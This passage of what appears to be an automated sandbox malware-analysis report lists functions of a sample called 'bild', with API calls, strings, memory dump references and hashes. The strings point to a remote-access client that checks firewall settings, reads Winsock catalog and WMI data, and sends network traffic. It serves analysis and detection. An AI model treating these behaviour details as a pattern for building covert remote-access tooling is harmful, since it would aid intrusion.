                                                                                      • API ID: QueryValue_memsetwsprintf
                                                                                      • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                      • API String ID: 1333399081-1346142259
                                                                                      • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                      • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                      • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                      • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                      Function 1100FDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                      • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 2427920155-3145022300
                                                                                      • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                      • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                      • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                      • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                      Function 6C5E6940 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                        • Part of subcall function 6C5E7BE0: _memset.LIBCMT ref: 6C5E7BFF
                                                                                        • Part of subcall function 6C5E7BE0: _strncpy.LIBCMT ref: 6C5E7C0B
                                                                                        • Part of subcall function 6C5DA4E0: EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
                                                                                        • Part of subcall function 6C5DA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
                                                                                        • Part of subcall function 6C5DA4E0: Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
                                                                                        • Part of subcall function 6C5DA4E0: LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                      • String ID: 1.2$Bl^l$Channel$Client$Publish %d pending services
                                                                                      • API String ID: 1112461860-3724619051
                                                                                      • Opcode ID: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
                                                                                      • Instruction ID: d7257693362b3b5800c530b124fa5055513c9b1dcfaaf5649dd297b53f66769a
                                                                                      • Opcode Fuzzy Hash: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
                                                                                      • Instruction Fuzzy Hash: 3551E671B04309DBDB10EA7EDC9679D37B4AB4938AF14053AC952C3E81DF30A944CB59
                                                                                      Function 11144BD0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                      • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                      • API String ID: 3494822531-1878648853
                                                                                      • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                      • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                      • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                      • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                      Function 11107290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • std::exception::exception.LIBCMT ref: 11107414
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                      • API String ID: 2851125068-2390547818
                                                                                      • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                      • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                      Function 11017300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 1101733C
                                                                                      • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                      • CoUninitialize.COMBASE ref: 110173D0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                      • API String ID: 2407233060-578995875
                                                                                      • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                      • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                      Function 11017220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 11017252
                                                                                      • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                      • CoUninitialize.COMBASE ref: 110172E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                      • API String ID: 2407233060-2037925671
                                                                                      • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                      • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                      Function 111386B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • DoICFConfig() OK, xrefs: 11138786
                                                                                      • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                      • AutoICFConfig, xrefs: 11138700
                                                                                      • Client, xrefs: 11138705
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick
                                                                                      • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                      • API String ID: 536389180-1512301160
                                                                                      • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                      • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                      Function 6C5D9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • send.WSOCK32(?,?,?,00000000), ref: 6C5D9C93
                                                                                      • timeGetTime.WINMM(?,?,?,00000000), ref: 6C5D9CD0
                                                                                      • Sleep.KERNEL32(00000000), ref: 6C5D9CDE
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C5D9D4F
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 6C5D9D72
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                      • String ID: 3'
                                                                                      • API String ID: 77915721-280543908
                                                                                      • Opcode ID: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
                                                                                      • Instruction ID: e4615c7a9f2bfe3b499a5afee83e88e60d15619c19cca24c9eeb59424fce252b
                                                                                      • Opcode Fuzzy Hash: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
                                                                                      • Instruction Fuzzy Hash: 4D21CD70A042188FDB20DF68DC98B9AB3B4AF45325F164295D80E9B681CA30ED84CF95
                                                                                      Function 11096970 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                      • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                      • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                      • API String ID: 3222248624-258972079
                                                                                      • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                      • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                      Function 11025D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                      • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                      • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                      • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                      • API String ID: 4186647306-532032230
                                                                                      • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
